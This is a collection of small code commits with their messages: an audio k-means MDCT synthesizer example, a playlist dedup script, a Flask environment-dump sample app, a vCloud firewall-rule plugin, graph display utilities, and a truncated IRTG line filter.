|
import featureflow as ff
import zounds
from random import choice
samplerate = zounds.SR11025()
BaseDocument = zounds.stft(resample_to=samplerate)
@zounds.simple_lmdb_settings('mdct_synth', map_size=1e10)
class Document(BaseDocument):
mdct = zounds.TimeFrequencyRepresentationFeature(
zounds.MDCT,
needs=BaseDocument.windowed,
store=True)
bark = zounds.ConstantRateTimeSeriesFeature(
zounds.BarkBands,
needs=BaseDocument.fft,
store=True)
@zounds.simple_settings
class DctKmeans(ff.BaseModel):
docs = ff.Feature(
ff.IteratorNode,
store=False)
shuffle = ff.NumpyFeature(
zounds.ReservoirSampler,
nsamples=1e6,
needs=docs,
store=True)
log = ff.PickleFeature(
zounds.Log,
needs=shuffle,
store=False)
unit_norm = ff.PickleFeature(
zounds.UnitNorm,
needs=log,
store=False)
kmeans = ff.PickleFeature(
zounds.KMeans,
centroids=512,
needs=unit_norm,
store=False)
pipeline = ff.PickleFeature(
zounds.PreprocessingPipeline,
needs=(log, unit_norm, kmeans),
store=True)
@zounds.simple_lmdb_settings('mdct_synth_with_codes', map_size=1e10)
class WithCodes(Document):
kmeans = zounds.ConstantRateTimeSeriesFeature(
zounds.Learned,
learned=DctKmeans(),
needs=Document.mdct,
store=True)
if __name__ == '__main__':
# stream all the audio files from the zip archive
filename = 'FlavioGaete22.zip'
print 'Processing Audio...'
for zf in ff.iter_zip(filename):
if '._' in zf.filename:
continue
print zf.filename
Document.process(meta=zf)
# learn k-means clusters for the mdct frames
print 'learning k-means clusters'
DctKmeans.process(docs=(doc.mdct for doc in Document))
synth = zounds.MDCTSynthesizer()
docs = list(doc for doc in WithCodes)
kmeans = DctKmeans()
def random_reconstruction():
doc = choice(docs)
transform_result = kmeans.pipeline.transform(doc.mdct)
recon_mdct = transform_result.inverse_transform()
recon_audio = synth.synthesize(recon_mdct)
return doc.ogg, recon_audio
app = zounds.ZoundsApp(
model=Document,
audio_feature=Document.ogg,
visualization_feature=Document.bark,
globals=globals(),
locals=locals())
app.start(8888)
|
Add new example for a simple k-means encoded MDCT synthesizerimport featureflow as ff
import zounds
from random import choice
samplerate = zounds.SR11025()
BaseDocument = zounds.stft(resample_to=samplerate)
@zounds.simple_lmdb_settings('mdct_synth', map_size=1e10)
class Document(BaseDocument):
mdct = zounds.TimeFrequencyRepresentationFeature(
zounds.MDCT,
needs=BaseDocument.windowed,
store=True)
bark = zounds.ConstantRateTimeSeriesFeature(
zounds.BarkBands,
needs=BaseDocument.fft,
store=True)
@zounds.simple_settings
class DctKmeans(ff.BaseModel):
docs = ff.Feature(
ff.IteratorNode,
store=False)
shuffle = ff.NumpyFeature(
zounds.ReservoirSampler,
nsamples=1e6,
needs=docs,
store=True)
log = ff.PickleFeature(
zounds.Log,
needs=shuffle,
store=False)
unit_norm = ff.PickleFeature(
zounds.UnitNorm,
needs=log,
store=False)
kmeans = ff.PickleFeature(
zounds.KMeans,
centroids=512,
needs=unit_norm,
store=False)
pipeline = ff.PickleFeature(
zounds.PreprocessingPipeline,
needs=(log, unit_norm, kmeans),
store=True)
@zounds.simple_lmdb_settings('mdct_synth_with_codes', map_size=1e10)
class WithCodes(Document):
kmeans = zounds.ConstantRateTimeSeriesFeature(
zounds.Learned,
learned=DctKmeans(),
needs=Document.mdct,
store=True)
if __name__ == '__main__':
# stream all the audio files from the zip archive
filename = 'FlavioGaete22.zip'
print 'Processing Audio...'
for zf in ff.iter_zip(filename):
if '._' in zf.filename:
continue
print zf.filename
Document.process(meta=zf)
# learn k-means clusters for the mdct frames
print 'learning k-means clusters'
DctKmeans.process(docs=(doc.mdct for doc in Document))
synth = zounds.MDCTSynthesizer()
docs = list(doc for doc in WithCodes)
kmeans = DctKmeans()
def random_reconstruction():
doc = choice(docs)
transform_result = kmeans.pipeline.transform(doc.mdct)
recon_mdct = transform_result.inverse_transform()
recon_audio = synth.synthesize(recon_mdct)
return doc.ogg, recon_audio
app = zounds.ZoundsApp(
model=Document,
audio_feature=Document.ogg,
visualization_feature=Document.bark,
globals=globals(),
locals=locals())
app.start(8888)
|
<commit_before><commit_msg>Add new example for a simple k-means encoded MDCT synthesizer<commit_after>import featureflow as ff
import zounds
from random import choice
samplerate = zounds.SR11025()
BaseDocument = zounds.stft(resample_to=samplerate)
@zounds.simple_lmdb_settings('mdct_synth', map_size=1e10)
class Document(BaseDocument):
mdct = zounds.TimeFrequencyRepresentationFeature(
zounds.MDCT,
needs=BaseDocument.windowed,
store=True)
bark = zounds.ConstantRateTimeSeriesFeature(
zounds.BarkBands,
needs=BaseDocument.fft,
store=True)
@zounds.simple_settings
class DctKmeans(ff.BaseModel):
docs = ff.Feature(
ff.IteratorNode,
store=False)
shuffle = ff.NumpyFeature(
zounds.ReservoirSampler,
nsamples=1e6,
needs=docs,
store=True)
log = ff.PickleFeature(
zounds.Log,
needs=shuffle,
store=False)
unit_norm = ff.PickleFeature(
zounds.UnitNorm,
needs=log,
store=False)
kmeans = ff.PickleFeature(
zounds.KMeans,
centroids=512,
needs=unit_norm,
store=False)
pipeline = ff.PickleFeature(
zounds.PreprocessingPipeline,
needs=(log, unit_norm, kmeans),
store=True)
@zounds.simple_lmdb_settings('mdct_synth_with_codes', map_size=1e10)
class WithCodes(Document):
kmeans = zounds.ConstantRateTimeSeriesFeature(
zounds.Learned,
learned=DctKmeans(),
needs=Document.mdct,
store=True)
if __name__ == '__main__':
# stream all the audio files from the zip archive
filename = 'FlavioGaete22.zip'
print 'Processing Audio...'
for zf in ff.iter_zip(filename):
if '._' in zf.filename:
continue
print zf.filename
Document.process(meta=zf)
# learn k-means clusters for the mdct frames
print 'learning k-means clusters'
DctKmeans.process(docs=(doc.mdct for doc in Document))
synth = zounds.MDCTSynthesizer()
docs = list(doc for doc in WithCodes)
kmeans = DctKmeans()
def random_reconstruction():
doc = choice(docs)
transform_result = kmeans.pipeline.transform(doc.mdct)
recon_mdct = transform_result.inverse_transform()
recon_audio = synth.synthesize(recon_mdct)
return doc.ogg, recon_audio
app = zounds.ZoundsApp(
model=Document,
audio_feature=Document.ogg,
visualization_feature=Document.bark,
globals=globals(),
locals=locals())
app.start(8888)
|
|
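An aside on the record above: its core technique is vector quantization of MDCT frames against a learned k-means codebook, with reconstruction done by swapping each frame for its nearest centroid. A minimal self-contained sketch of that encode/decode round trip, using numpy and scikit-learn instead of the zounds/featureflow pipeline (the frame matrix below is random, purely illustrative):

import numpy as np
from sklearn.cluster import KMeans

# Stand-in for log-scaled, unit-normed MDCT frames: (n_frames, n_coefficients).
frames = np.random.randn(2000, 256).astype(np.float32)

# Learn a 512-entry codebook, mirroring centroids=512 in the record above.
codebook = KMeans(n_clusters=512, n_init=4).fit(frames)

# Encode: each frame collapses to one code, the index of its nearest centroid.
codes = codebook.predict(frames)

# Decode: look each code back up; this lossy reconstruction is what an MDCT
# synthesizer would turn back into audio.
recon = codebook.cluster_centers_[codes]

print(codes.shape, recon.shape)  # (2000,) (2000, 256)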
2137970240a9524990d55d711951fb7358621275
|
dedup_xspf.py
|
dedup_xspf.py
|
import xml.etree.ElementTree as ET
from urllib.parse import unquote, urlparse
import os
import sys
from fuzzywuzzy import process, fuzz # ImportError? pip install 'fuzzywuzzy[speedup]'
import re
files = [unquote(urlparse(el.text).path)
for el in ET.parse(sys.argv[1]).getroot()
.findall(".//*/{http://xspf.org/ns/0/}location")
]
pfx = len(os.path.commonprefix(files))
trimmed = [re.search(r" - ([^_]+)", f[pfx:]).group(1) for f in files]
for i, file in enumerate(files):
others = trimmed[i + 1:] # Assume that similarity is commutative
any = False
for name, score in process.extractBests(trimmed[i], others, score_cutoff=80, scorer=fuzz.token_set_ratio):
if not any:
any = True
print(file)
print(name)
if any: print("-----")
|
Create a little dedup script, probably not very general
|
Create a little dedup script, probably not very general
|
Python
|
mit
|
Rosuav/shed,Rosuav/shed,Rosuav/shed,Rosuav/shed,Rosuav/shed
|
Create a little dedup script, probably not very general
|
import xml.etree.ElementTree as ET
from urllib.parse import unquote, urlparse
import os
import sys
from fuzzywuzzy import process, fuzz # ImportError? pip install 'fuzzywuzzy[speedup]'
import re
files = [unquote(urlparse(el.text).path)
for el in ET.parse(sys.argv[1]).getroot()
.findall(".//*/{http://xspf.org/ns/0/}location")
]
pfx = len(os.path.commonprefix(files))
trimmed = [re.search(r" - ([^_]+)", f[pfx:]).group(1) for f in files]
for i, file in enumerate(files):
others = trimmed[i + 1:] # Assume that similarity is commutative
any = False
for name, score in process.extractBests(trimmed[i], others, score_cutoff=80, scorer=fuzz.token_set_ratio):
if not any:
any = True
print(file)
print(name)
if any: print("-----")
|
<commit_before><commit_msg>Create a little dedup script, probably not very general<commit_after>
|
import xml.etree.ElementTree as ET
from urllib.parse import unquote, urlparse
import os
import sys
from fuzzywuzzy import process, fuzz # ImportError? pip install 'fuzzywuzzy[speedup]'
import re
files = [unquote(urlparse(el.text).path)
for el in ET.parse(sys.argv[1]).getroot()
.findall(".//*/{http://xspf.org/ns/0/}location")
]
pfx = len(os.path.commonprefix(files))
trimmed = [re.search(r" - ([^_]+)", f[pfx:]).group(1) for f in files]
for i, file in enumerate(files):
others = trimmed[i + 1:] # Assume that similarity is commutative
any = False
for name, score in process.extractBests(trimmed[i], others, score_cutoff=80, scorer=fuzz.token_set_ratio):
if not any:
any = True
print(file)
print(name)
if any: print("-----")
|
Create a little dedup script, probably not very generalimport xml.etree.ElementTree as ET
from urllib.parse import unquote, urlparse
import os
import sys
from fuzzywuzzy import process, fuzz # ImportError? pip install 'fuzzywuzzy[speedup]'
import re
files = [unquote(urlparse(el.text).path)
for el in ET.parse(sys.argv[1]).getroot()
.findall(".//*/{http://xspf.org/ns/0/}location")
]
pfx = len(os.path.commonprefix(files))
trimmed = [re.search(r" - ([^_]+)", f[pfx:]).group(1) for f in files]
for i, file in enumerate(files):
others = trimmed[i + 1:] # Assume that similarity is commutative
any = False
for name, score in process.extractBests(trimmed[i], others, score_cutoff=80, scorer=fuzz.token_set_ratio):
if not any:
any = True
print(file)
print(name)
if any: print("-----")
|
<commit_before><commit_msg>Create a little dedup script, probably not very general<commit_after>import xml.etree.ElementTree as ET
from urllib.parse import unquote, urlparse
import os
import sys
from fuzzywuzzy import process, fuzz # ImportError? pip install 'fuzzywuzzy[speedup]'
import re
files = [unquote(urlparse(el.text).path)
for el in ET.parse(sys.argv[1]).getroot()
.findall(".//*/{http://xspf.org/ns/0/}location")
]
pfx = len(os.path.commonprefix(files))
trimmed = [re.search(r" - ([^_]+)", f[pfx:]).group(1) for f in files]
for i, file in enumerate(files):
others = trimmed[i + 1:] # Assume that similarity is commutative
any = False
for name, score in process.extractBests(trimmed[i], others, score_cutoff=80, scorer=fuzz.token_set_ratio):
if not any:
any = True
print(file)
print(name)
if any: print("-----")
|
|
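A brief aside on the matching step in the script above: process.extractBests compares one trimmed title against the remaining ones and keeps every candidate scoring at least the cutoff under token_set_ratio, which ignores token order and repetition. A tiny standalone illustration (the titles are made up):

from fuzzywuzzy import process, fuzz

titles = [
    "Song of Storms (Remix)",
    "Song of Storms Remix",
    "Completely Different Track",
]

# Compare the first title against the rest; the two remix variants match
# despite the punctuation difference, the third title does not.
matches = process.extractBests(
    titles[0], titles[1:], scorer=fuzz.token_set_ratio, score_cutoff=80)
print(matches)  # [('Song of Storms Remix', 100)]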
6acb354fff4aafcdc006a13d947721d7dcfff5c5
|
sample/src/app/app.py
|
sample/src/app/app.py
|
#!/usr/bin/env python
import os
import json
from flask import jsonify
from flask import Flask
app = Flask(__name__)
@app.route("/env")
def environment():
properties = []
for k,v in sorted(os.environ.iteritems()):
properties.append(k + "=" + v)
return json.dumps(properties, indent=4)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=int(os.getenv('PORT', '8080')))
|
#!/usr/bin/env python
import os
import json
from flask import jsonify
from flask import Flask
app = Flask(__name__)
@app.route("/env")
def environment():
return json.dumps(dict(os.environ), indent=4)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=int(os.getenv('PORT', '8080')))
|
Return env as dict rather than array of properties
|
Return env as dict rather than array of properties
|
Python
|
apache-2.0
|
cf-platform-eng/tile-generator,cf-platform-eng/tile-generator,alex-slynko/tile-generator,alex-slynko/tile-generator,alex-slynko/tile-generator,alex-slynko/tile-generator,cf-platform-eng/tile-generator,cf-platform-eng/tile-generator
|
#!/usr/bin/env python
import os
import json
from flask import jsonify
from flask import Flask
app = Flask(__name__)
@app.route("/env")
def environment():
properties = []
for k,v in sorted(os.environ.iteritems()):
properties.append(k + "=" + v)
return json.dumps(properties, indent=4)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=int(os.getenv('PORT', '8080')))
Return env as dict rather than array of properties
|
#!/usr/bin/env python
import os
import json
from flask import jsonify
from flask import Flask
app = Flask(__name__)
@app.route("/env")
def environment():
return json.dumps(dict(os.environ), indent=4)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=int(os.getenv('PORT', '8080')))
|
<commit_before>#!/usr/bin/env python
import os
import json
from flask import jsonify
from flask import Flask
app = Flask(__name__)
@app.route("/env")
def environment():
properties = []
for k,v in sorted(os.environ.iteritems()):
properties.append(k + "=" + v)
return json.dumps(properties, indent=4)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=int(os.getenv('PORT', '8080')))
<commit_msg>Return env as dict rather than array of properties<commit_after>
|
#!/usr/bin/env python
import os
import json
from flask import jsonify
from flask import Flask
app = Flask(__name__)
@app.route("/env")
def environment():
return json.dumps(dict(os.environ), indent=4)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=int(os.getenv('PORT', '8080')))
|
#!/usr/bin/env python
import os
import json
from flask import jsonify
from flask import Flask
app = Flask(__name__)
@app.route("/env")
def environment():
properties = []
for k,v in sorted(os.environ.iteritems()):
properties.append(k + "=" + v)
return json.dumps(properties, indent=4)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=int(os.getenv('PORT', '8080')))
Return env as dict rather than array of properties#!/usr/bin/env python
import os
import json
from flask import jsonify
from flask import Flask
app = Flask(__name__)
@app.route("/env")
def environment():
return json.dumps(dict(os.environ), indent=4)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=int(os.getenv('PORT', '8080')))
|
<commit_before>#!/usr/bin/env python
import os
import json
from flask import jsonify
from flask import Flask
app = Flask(__name__)
@app.route("/env")
def environment():
properties = []
for k,v in sorted(os.environ.iteritems()):
properties.append(k + "=" + v)
return json.dumps(properties, indent=4)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=int(os.getenv('PORT', '8080')))
<commit_msg>Return env as dict rather than array of properties<commit_after>#!/usr/bin/env python
import os
import json
from flask import jsonify
from flask import Flask
app = Flask(__name__)
@app.route("/env")
def environment():
return json.dumps(dict(os.environ), indent=4)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=int(os.getenv('PORT', '8080')))
|
84fe4ef3b99990afba49a5943c9523797cdb5a7a
|
network_plugin/security_group.py
|
network_plugin/security_group.py
|
from cloudify import ctx
from cloudify import exceptions as cfy_exc
from cloudify.decorators import operation
from vcloud_plugin_common import with_vcd_client, wait_for_task
from network_operations import ProxyVCD
from network_plugin import check_ip, get_vm_ip
valid_protocols = ["Tcp", "Udp", "Icmp", "Any"]
CREATE_RULE = 1
DELETE_RULE = 2
@operation
@with_vcd_client
def create(vcd_client, **kwargs):
_rule_operation(CREATE_RULE, vcd_client)
@operation
@with_vcd_client
def delete(vcd_client, **kwargs):
_rule_operation(DELETE_RULE, vcd_client)
def _rule_operation(operation, vcd_client):
    vcd_client = ProxyVCD(vcd_client) # TODO: remove when our code is merged into pyvcloud
gateway = vcd_client.get_gateway(
ctx.node.properties['gateway'])
protocol = _check_protocol(ctx.node.properties['rule']['protocol'])
dest_port = str(ctx.node.properties['rule']['port'])
description = ctx.node.properties['rule']['description']
dest_ip = check_ip(get_vm_ip(vcd_client, ctx))
task = None
if operation == CREATE_RULE:
success, task = gateway.add_fw_rule(True, description, "allow", protocol, dest_port, dest_ip,
"Any", "External", False)
if not success:
raise cfy_exc.NonRecoverableError(
"Could not add firewall rule: {0}".format(description))
if operation == DELETE_RULE:
success, task = gateway.delete_fw_rule(protocol, dest_port, dest_ip,
"Any", "external")
if not success:
raise cfy_exc.NonRecoverableError(
"Could not delete firewall rule: {0}".format(description))
if task:
wait_for_task(vcd_client, task)
def _check_protocol(protocol):
protocol = protocol.capitalize()
if protocol not in valid_protocols:
raise cfy_exc.NonRecoverableError(
"Unknown protocol: {0}. Valid protocols are: {1}".format(protocol, valid_protocols))
return protocol
|
Add new security group operation source code
|
Add new security group operation source code
|
Python
|
apache-2.0
|
nmishkin/tosca-vcloud-plugin,cloudify-cosmo/tosca-vcloud-plugin,kemiz/tosca-vcloud-plugin,denismakogon/tosca-vcloud-plugin,vmware/tosca-vcloud-plugin,geokala/tosca-vcloud-plugin
|
Add new security group operation source code
|
from cloudify import ctx
from cloudify import exceptions as cfy_exc
from cloudify.decorators import operation
from vcloud_plugin_common import with_vcd_client, wait_for_task
from network_operations import ProxyVCD
from network_plugin import check_ip, get_vm_ip
valid_protocols = ["Tcp", "Udp", "Icmp", "Any"]
CREATE_RULE = 1
DELETE_RULE = 2
@operation
@with_vcd_client
def create(vcd_client, **kwargs):
_rule_operation(CREATE_RULE, vcd_client)
@operation
@with_vcd_client
def delete(vcd_client, **kwargs):
_rule_operation(DELETE_RULE, vcd_client)
def _rule_operation(operation, vcd_client):
    vcd_client = ProxyVCD(vcd_client) # TODO: remove when our code is merged into pyvcloud
gateway = vcd_client.get_gateway(
ctx.node.properties['gateway'])
protocol = _check_protocol(ctx.node.properties['rule']['protocol'])
dest_port = str(ctx.node.properties['rule']['port'])
description = ctx.node.properties['rule']['description']
dest_ip = check_ip(get_vm_ip(vcd_client, ctx))
task = None
if operation == CREATE_RULE:
success, task = gateway.add_fw_rule(True, description, "allow", protocol, dest_port, dest_ip,
"Any", "External", False)
if not success:
raise cfy_exc.NonRecoverableError(
"Could not add firewall rule: {0}".format(description))
if operation == DELETE_RULE:
success, task = gateway.delete_fw_rule(protocol, dest_port, dest_ip,
"Any", "external")
if not success:
raise cfy_exc.NonRecoverableError(
"Could not delete firewall rule: {0}".format(description))
if task:
wait_for_task(vcd_client, task)
def _check_protocol(protocol):
protocol = protocol.capitalize()
if protocol not in valid_protocols:
raise cfy_exc.NonRecoverableError(
"Unknown protocol: {0}. Valid protocols are: {1}".format(protocol, valid_protocols))
return protocol
|
<commit_before><commit_msg>Add new security group operation source code<commit_after>
|
from cloudify import ctx
from cloudify import exceptions as cfy_exc
from cloudify.decorators import operation
from vcloud_plugin_common import with_vcd_client, wait_for_task
from network_operations import ProxyVCD
from network_plugin import check_ip, get_vm_ip
valid_protocols = ["Tcp", "Udp", "Icmp", "Any"]
CREATE_RULE = 1
DELETE_RULE = 2
@operation
@with_vcd_client
def create(vcd_client, **kwargs):
_rule_operation(CREATE_RULE, vcd_client)
@operation
@with_vcd_client
def delete(vcd_client, **kwargs):
_rule_operation(DELETE_RULE, vcd_client)
def _rule_operation(operation, vcd_client):
    vcd_client = ProxyVCD(vcd_client) # TODO: remove when our code is merged into pyvcloud
gateway = vcd_client.get_gateway(
ctx.node.properties['gateway'])
protocol = _check_protocol(ctx.node.properties['rule']['protocol'])
dest_port = str(ctx.node.properties['rule']['port'])
description = ctx.node.properties['rule']['description']
dest_ip = check_ip(get_vm_ip(vcd_client, ctx))
task = None
if operation == CREATE_RULE:
success, task = gateway.add_fw_rule(True, description, "allow", protocol, dest_port, dest_ip,
"Any", "External", False)
if not success:
raise cfy_exc.NonRecoverableError(
"Could not add firewall rule: {0}".format(description))
if operation == DELETE_RULE:
success, task = gateway.delete_fw_rule(protocol, dest_port, dest_ip,
"Any", "external")
if not success:
raise cfy_exc.NonRecoverableError(
"Could not delete firewall rule: {0}".format(description))
if task:
wait_for_task(vcd_client, task)
def _check_protocol(protocol):
protocol = protocol.capitalize()
if protocol not in valid_protocols:
raise cfy_exc.NonRecoverableError(
"Unknown protocol: {0}. Valid protocols are: {1}".format(protocol, valid_protocols))
return protocol
|
Add new security group operation source codefrom cloudify import ctx
from cloudify import exceptions as cfy_exc
from cloudify.decorators import operation
from vcloud_plugin_common import with_vcd_client, wait_for_task
from network_operations import ProxyVCD
from network_plugin import check_ip, get_vm_ip
valid_protocols = ["Tcp", "Udp", "Icmp", "Any"]
CREATE_RULE = 1
DELETE_RULE = 2
@operation
@with_vcd_client
def create(vcd_client, **kwargs):
_rule_operation(CREATE_RULE, vcd_client)
@operation
@with_vcd_client
def delete(vcd_client, **kwargs):
_rule_operation(DELETE_RULE, vcd_client)
def _rule_operation(operation, vcd_client):
    vcd_client = ProxyVCD(vcd_client) # TODO: remove when our code is merged into pyvcloud
gateway = vcd_client.get_gateway(
ctx.node.properties['gateway'])
protocol = _check_protocol(ctx.node.properties['rule']['protocol'])
dest_port = str(ctx.node.properties['rule']['port'])
description = ctx.node.properties['rule']['description']
dest_ip = check_ip(get_vm_ip(vcd_client, ctx))
task = None
if operation == CREATE_RULE:
success, task = gateway.add_fw_rule(True, description, "allow", protocol, dest_port, dest_ip,
"Any", "External", False)
if not success:
raise cfy_exc.NonRecoverableError(
"Could not add firewall rule: {0}".format(description))
if operation == DELETE_RULE:
success, task = gateway.delete_fw_rule(protocol, dest_port, dest_ip,
"Any", "external")
if not success:
raise cfy_exc.NonRecoverableError(
"Could not delete firewall rule: {0}".format(description))
if task:
wait_for_task(vcd_client, task)
def _check_protocol(protocol):
protocol = protocol.capitalize()
if protocol not in valid_protocols:
raise cfy_exc.NonRecoverableError(
"Unknown protocol: {0}. Valid protocols are: {1}".format(protocol, valid_protocols))
return protocol
|
<commit_before><commit_msg>Add new security group operation source code<commit_after>from cloudify import ctx
from cloudify import exceptions as cfy_exc
from cloudify.decorators import operation
from vcloud_plugin_common import with_vcd_client, wait_for_task
from network_operations import ProxyVCD
from network_plugin import check_ip, get_vm_ip
valid_protocols = ["Tcp", "Udp", "Icmp", "Any"]
CREATE_RULE = 1
DELETE_RULE = 2
@operation
@with_vcd_client
def create(vcd_client, **kwargs):
_rule_operation(CREATE_RULE, vcd_client)
@operation
@with_vcd_client
def delete(vcd_client, **kwargs):
_rule_operation(DELETE_RULE, vcd_client)
def _rule_operation(operation, vcd_client):
    vcd_client = ProxyVCD(vcd_client) # TODO: remove when our code is merged into pyvcloud
gateway = vcd_client.get_gateway(
ctx.node.properties['gateway'])
protocol = _check_protocol(ctx.node.properties['rule']['protocol'])
dest_port = str(ctx.node.properties['rule']['port'])
description = ctx.node.properties['rule']['description']
dest_ip = check_ip(get_vm_ip(vcd_client, ctx))
task = None
if operation == CREATE_RULE:
success, task = gateway.add_fw_rule(True, description, "allow", protocol, dest_port, dest_ip,
"Any", "External", False)
if not success:
raise cfy_exc.NonRecoverableError(
"Could not add firewall rule: {0}".format(description))
if operation == DELETE_RULE:
success, task = gateway.delete_fw_rule(protocol, dest_port, dest_ip,
"Any", "external")
if not success:
raise cfy_exc.NonRecoverableError(
"Could not delete firewall rule: {0}".format(description))
if task:
wait_for_task(vcd_client, task)
def _check_protocol(protocol):
protocol = protocol.capitalize()
if protocol not in valid_protocols:
raise cfy_exc.NonRecoverableError(
"Unknown protocol: {0}. Valid protocols are: {1}".format(protocol, valid_protocols))
return protocol
|
|
aacbfc7039456f66139b3d2f9789b0edbc36428d
|
neurokernel/tools/graph_utils.py
|
neurokernel/tools/graph_utils.py
|
#!/usr/bin/env python
"""
Graph manipulation and visualization tools
"""
import tempfile
import os
import matplotlib.pyplot as plt
import networkx as nx
def imdisp(f):
"""
Display the specified image file using matplotlib.
"""
im = plt.imread(f)
plt.imshow(im)
plt.axis('off')
plt.draw()
return im
def show_pydot(g):
"""
Display a networkx graph using pydot.
"""
fd = tempfile.NamedTemporaryFile()
fd.close()
p = nx.to_pydot(g)
p.write_jpg(fd.name)
imdisp(fd.name)
os.remove(fd.name)
def show_pygraphviz(g, prog='dot', graph_attr={}, node_attr={}, edge_attr={}):
"""
Display a networkx graph using pygraphviz.
Parameters
----------
prog : str
Executable for generating the image.
graph_attr : dict
Global graph display attributes.
node_attr : dict
Global node display attributes.
edge_attr : dict
Global edge display attributes.
"""
fd = tempfile.NamedTemporaryFile(suffix='.jpg')
fd.close()
p = nx.to_agraph(g)
p.graph_attr.update(graph_attr)
p.node_attr.update(node_attr)
p.edge_attr.update(edge_attr)
p.draw(fd.name, prog=prog)
imdisp(fd.name)
os.remove(fd.name)
|
Add networkx graph display utilities.
|
Add networkx graph display utilities.
|
Python
|
bsd-3-clause
|
cerrno/neurokernel
|
Add networkx graph display utilities.
|
#!/usr/bin/env python
"""
Graph manipulation and visualization tools
"""
import tempfile
import os
import matplotlib.pyplot as plt
import networkx as nx
def imdisp(f):
"""
Display the specified image file using matplotlib.
"""
im = plt.imread(f)
plt.imshow(im)
plt.axis('off')
plt.draw()
return im
def show_pydot(g):
"""
Display a networkx graph using pydot.
"""
fd = tempfile.NamedTemporaryFile()
fd.close()
p = nx.to_pydot(g)
p.write_jpg(fd.name)
imdisp(fd.name)
os.remove(fd.name)
def show_pygraphviz(g, prog='dot', graph_attr={}, node_attr={}, edge_attr={}):
"""
Display a networkx graph using pygraphviz.
Parameters
----------
prog : str
Executable for generating the image.
graph_attr : dict
Global graph display attributes.
node_attr : dict
Global node display attributes.
edge_attr : dict
Global edge display attributes.
"""
fd = tempfile.NamedTemporaryFile(suffix='.jpg')
fd.close()
p = nx.to_agraph(g)
p.graph_attr.update(graph_attr)
p.node_attr.update(node_attr)
p.edge_attr.update(edge_attr)
p.draw(fd.name, prog=prog)
imdisp(fd.name)
os.remove(fd.name)
|
<commit_before><commit_msg>Add networkx graph display utilities.<commit_after>
|
#!/usr/bin/env python
"""
Graph manipulation and visualization tools
"""
import tempfile
import os
import matplotlib.pyplot as plt
import networkx as nx
def imdisp(f):
"""
Display the specified image file using matplotlib.
"""
im = plt.imread(f)
plt.imshow(im)
plt.axis('off')
plt.draw()
return im
def show_pydot(g):
"""
Display a networkx graph using pydot.
"""
fd = tempfile.NamedTemporaryFile()
fd.close()
p = nx.to_pydot(g)
p.write_jpg(fd.name)
imdisp(fd.name)
os.remove(fd.name)
def show_pygraphviz(g, prog='dot', graph_attr={}, node_attr={}, edge_attr={}):
"""
Display a networkx graph using pygraphviz.
Parameters
----------
prog : str
Executable for generating the image.
graph_attr : dict
Global graph display attributes.
node_attr : dict
Global node display attributes.
edge_attr : dict
Global edge display attributes.
"""
fd = tempfile.NamedTemporaryFile(suffix='.jpg')
fd.close()
p = nx.to_agraph(g)
p.graph_attr.update(graph_attr)
p.node_attr.update(node_attr)
p.edge_attr.update(edge_attr)
p.draw(fd.name, prog=prog)
imdisp(fd.name)
os.remove(fd.name)
|
Add networkx graph display utilities.#!/usr/bin/env python
"""
Graph manipulation and visualization tools
"""
import tempfile
import os
import matplotlib.pyplot as plt
import networkx as nx
def imdisp(f):
"""
Display the specified image file using matplotlib.
"""
im = plt.imread(f)
plt.imshow(im)
plt.axis('off')
plt.draw()
return im
def show_pydot(g):
"""
Display a networkx graph using pydot.
"""
fd = tempfile.NamedTemporaryFile()
fd.close()
p = nx.to_pydot(g)
p.write_jpg(fd.name)
imdisp(fd.name)
os.remove(fd.name)
def show_pygraphviz(g, prog='dot', graph_attr={}, node_attr={}, edge_attr={}):
"""
Display a networkx graph using pygraphviz.
Parameters
----------
prog : str
Executable for generating the image.
graph_attr : dict
Global graph display attributes.
node_attr : dict
Global node display attributes.
edge_attr : dict
Global edge display attributes.
"""
fd = tempfile.NamedTemporaryFile(suffix='.jpg')
fd.close()
p = nx.to_agraph(g)
p.graph_attr.update(graph_attr)
p.node_attr.update(node_attr)
p.edge_attr.update(edge_attr)
p.draw(fd.name, prog=prog)
imdisp(fd.name)
os.remove(fd.name)
|
<commit_before><commit_msg>Add networkx graph display utilities.<commit_after>#!/usr/bin/env python
"""
Graph manipulation and visualization tools
"""
import tempfile
import os
import matplotlib.pyplot as plt
import networkx as nx
def imdisp(f):
"""
Display the specified image file using matplotlib.
"""
im = plt.imread(f)
plt.imshow(im)
plt.axis('off')
plt.draw()
return im
def show_pydot(g):
"""
Display a networkx graph using pydot.
"""
fd = tempfile.NamedTemporaryFile()
fd.close()
p = nx.to_pydot(g)
p.write_jpg(fd.name)
imdisp(fd.name)
os.remove(fd.name)
def show_pygraphviz(g, prog='dot', graph_attr={}, node_attr={}, edge_attr={}):
"""
Display a networkx graph using pygraphviz.
Parameters
----------
prog : str
Executable for generating the image.
graph_attr : dict
Global graph display attributes.
node_attr : dict
Global node display attributes.
edge_attr : dict
Global edge display attributes.
"""
fd = tempfile.NamedTemporaryFile(suffix='.jpg')
fd.close()
p = nx.to_agraph(g)
p.graph_attr.update(graph_attr)
p.node_attr.update(node_attr)
p.edge_attr.update(edge_attr)
p.draw(fd.name, prog=prog)
imdisp(fd.name)
os.remove(fd.name)
|
|
91fa4f5079f463b3a1f90e0c40daa8d5a529439a
|
exp/alto/tools/filter_lines.py
|
exp/alto/tools/filter_lines.py
|
#!/usr/bin/env python
import sys
from sets import Set
#Should be used on IRTGs with multiple language preterms/terminals
def filter_lines(fn):
seen = Set()
skip = False
is_empty = True
file_lines = open(fn, "r").readlines()
for line in file_lines:
line = line.strip()
if line == "":
is_empty = True
skip = False
print line
continue
if is_empty == True:
is_empty = False
if line in seen:
skip = True
else:
seen.add(line)
if skip == True:
continue
else:
print line
filter_lines(sys.argv[1])
|
Add script for filtering lines of IRTGs with multiple language preterms/terminals
|
Add script for filtering lines of IRTGs with multiple language preterms/terminals
|
Python
|
mit
|
kornai/4lang,kornai/4lang,kornai/4lang,kornai/4lang
|
Add script for filtering lines of IRTGs with multiple language preterms/terminals
|
#!/usr/bin/env python
import sys
from sets import Set
#Should be used on IRTGs with multiple language preterms/terminals
